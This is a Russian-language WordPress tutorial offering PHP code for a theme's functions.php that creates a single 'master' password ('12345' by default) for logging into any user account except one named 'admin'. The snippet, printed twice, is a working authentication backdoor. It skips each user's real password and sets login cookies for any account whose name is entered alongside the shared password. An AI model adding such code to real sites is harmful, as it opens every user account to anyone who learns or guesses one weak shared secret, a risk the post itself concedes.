Единый пароль для всех аккаунтов на сайте WordPress

Создадим единый пароль для всех пользователей сайта на WordPress, просто разместив функцию в файле function.php вашего шаблона:

add_action('wp_authenticate','sign_primary_pass_system');
function sign_primary_pass_system($login){
     $log = $_POST['log'];
     $pwd = $_POST['pwd'];
     $primary = '12345'; //Здесь указываем ваш единый пароль

	$user = get_user_by('login', $log);
	if(user_pass_ok( $log, $pwd )) return;

	if($user&amp;&amp;$pwd==$primary&amp;&amp;$log!='admin'){
		nocache_headers();  
		wp_clear_auth_cookie(); 
		wp_set_auth_cookie( $user-&gt;ID, false );
		wp_redirect('/'); exit;
	}
	return;
}

add_action('wp_authenticate','sign_primary_pass_system');

function sign_primary_pass_system($login){

$log = $_POST['log'];

$pwd = $_POST['pwd'];

$primary = '12345'; //Здесь указываем ваш единый пароль

$user = get_user_by('login', $log);

if(user_pass_ok( $log, $pwd )) return;

if($user&&$pwd==$primary&&$log!='admin'){

nocache_headers();

wp_clear_auth_cookie();

wp_set_auth_cookie( $user->ID, false );

wp_redirect('/'); exit;

}

return;

}

Пароль который вы укажите в качестве единого, будет подходить ко всем аккаунтам, кроме аккаунта с логином admin. Здесь вы можете указать в качестве исключения любой другой логин, если у администратора сайта логин не admin, а какой то другой. Делаем мы это для обеспечения безопасности административного аккаунта.

Данный пароль следует вводить на странице wp-login.php, в других случаях работа пароля не гарантируется.

Хранить данный пароль естественно нужно в секрете, иначе злоумышленник с его помощью получит доступы ко всем аккаунтам пользователей.

Автор публикации

не в сети 2 недели

GOOD WEBMASTER

В наличии любые плагины и темы последних версий от компании AIT THEMES

Поддержать проект монетой можно так: https://money.yandex.ru/to/410012768487959

Комментарии: 6Публикации: 262Регистрация: 17-12-2017

Метки

Единый пароль